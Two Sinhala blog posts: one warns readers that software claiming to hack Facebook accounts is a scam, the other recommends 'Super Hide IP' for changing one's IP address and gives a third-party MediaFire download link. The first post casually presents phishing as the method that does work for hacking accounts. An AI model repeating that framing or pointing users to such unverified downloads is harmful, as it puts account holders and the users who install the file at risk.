දැන් කවුරුහරි සල්ලි වැඩි පිස්සෙක් ඕක ගෙවලා කෝඩ් එකත් ගත්ත කියලා හිතමු....සොෆ්ට්වෙයා එකනම් ACTIVE වෙනවා...ඒත් ලැබෙන පාස්වර්ඩ් එකනම් බොරුවක්...
කොටින්ම කිව්වොත් කිසිම සොෆ්ට්වෙයා එකකට බෑ ගහෙන් ගෙඩි එන්නා වගේ ෆේස් බුක් ගිනුමක් හැක් කරන්න...
යම් කිසි මෘදුකාංගයක් කියනවනම් facebook account එකේ account ID , facebook account එකේ email එක වගේ දෙයක් දුන්නම ෆේස්බුක් ගිනුම හැක් කරලා දෙනව කියලා ඒක පට්ටම පට්ට බොරුවක්...මම ඒක අත්දැකීමෙන් කියන්නේ...හැබැයි මම නම් සල්ලි වියදම් කර කර activation codes ගත්තේ නෑ....නෙට් එකේ හොයලම කෝඩ් ටිකත් එහෙන් මෙහෙන් හොයාගෙන මෘදුකාංග 20ක් විතර ඇක්ටිව් කරලා බැලුවා....ඒත් ඒ හැම එකක්ම පට්ට බොරු....
උදාහරනයක් විදිහ‍ට මේ වෙබ් සයිට් එකට ගිහින් Facebook Hacker Pro ඩවුන්ලෝඩ් කරගන්නකෝ...දැන් ඔයාට හැක් කරන්න ඕකන් ෆේස්බුක් ගිනුමේ ඊ-මේල් ලිපිනය ඉල්ලයි...ඒක දීලා හැක් කරන්න කිව්වම activation code  එකක් ඉල්ලයි.දැන් ඒකේ activation code එක විදිහට ඔයා කැමති ඉලක්කම් 8ක් ඇතුලත් කරන්න.ඔන්න දැන් ඔයාගේ මෘදුකාංගය ඇක්ටිව් වෙයි...ඒත් ඇත්ත පාස්වර්ඩ් එක ලැබෙන්නෑ...ඔයාගේ පරිගනකයේ ඇති පාස්වර්ඩ් එකක් ලැබෙයි...
දැන් ඔයාට තේරෙනවා නේද මේ මෘදුකාංග ඔක්කෝම බොරු කියලා....

හොදයි එහෙනම් මම ඔයාලට දෙන උපදේශය තමා ගහෙන් ගෙඩි එන්නා වගේ පට පට ගාලා ෆේස්බුක් ගිනුම් හැක් කරනවා කියන මෘදුකාංග ඔක්කොම සල්ලි ගරන පට්ටම පට්ට බොරු......................

හරි එහෙනම් ඒ වගේ දෙවල් වලට අහු වෙන්න එපා....හැක් කරනවා කියන්නේ කොහොමටවත් ලේසි වැඩක් නෙමේ...ඔයාගේ මහන්සියෙන් කරන phishing වගේ දේකින් මිස කවදාවත් සාර්ථකව හැක් කරන්න බෑ...


එහෙනම් යන ගමන් comment එකකුත් දාලා යන්නකෝ

Wednesday, December 4, 2013

How To IP Hide...!.Part 1#

                             කොහොමද IP ලිපිනය සගවන්නේ 1# කොටස

මේ ලිපියෙන් මම ඔයාලට කියල දෙනවා අපේ IP Address එක ලේසියෙන්ම ඕන වෙලාවක වෙනස් කරගන්නේ කොහොමද කියල. එක එක අය එක එක ක්‍රම පාවිච්චි කරනවා. මම මේ දෙන ක්‍රමෙත් ගොඩක් පහසු වගේම 100% සාර්ථක ක්‍රමයක්. බලමු එහෙනම් මොකක්ද කියල.
මේ සොෆ්ට්වෙයාර් එකට කියන්නෙ Super Hide IP කියලා..මේක පුංචි Software කෑල්ලක්. Download කරගෙන Install කරගන්න විතරයි තියෙන්නේ. Install කරන්නත් ලේසියි. ඒවගේම ලෝකේ ගොඩක් රටවල එක එක IP දීල තියෙනවා. ඔයාලට තියෙන්නේ කැමති තැනක IP එකක් තෝරාගන්න එක විතරයි.ඒවගේම මේ Software එක 100% Free Software එකක්.ඒනිසා කිසිම කරදරයක් ඇති වෙන්නෙත් නැහැ. එහෙනම් පහලින් Software එක Download කරගන්න. අපැහැදිලි තැනක් තියෙනවා නම් කොමෙන්ට් කරලා දැනගන්න.


http://download2039.mediafire.com/g0a0i739ur6g/c2po8i9jbrvr55m/Super+Hide+IP+v3.2.4.2_-by_-UwEeN-_.rar
අපිට දෙයක් ලැබුනාම තනියම තියාගෙන පුරුද්දක් නැති නිසා මේක ඔයාලටත් කියලා දෙන්න හිතුවා. ඉතින් මම හිතනවා අපේ සිංහල බ්ලොග් කරන කොල්ලොන්ට කෙල්ලොන්ට මේ ලිපිය පට්ට වැදගත් වෙයි කියලා. මේක ඔයාලට ප්‍රයෝජනයක් උනා නම් කමෙන්ට් එකක් දාලා යන්න. මොකක් හරි ගැටලුවක් ආවත් කමෙන්ට් එකක් දාලා අහන්න. අකමැත්තක් නැත්තම් විතරක් මගේ බ්ලොග් එක Follow කරලා මට සහයෝගය දක්වන්න. ස්තූතියි... තවත් වැදගත් ලිපියකින් ආයෙත් හමුවෙමු

 
biz.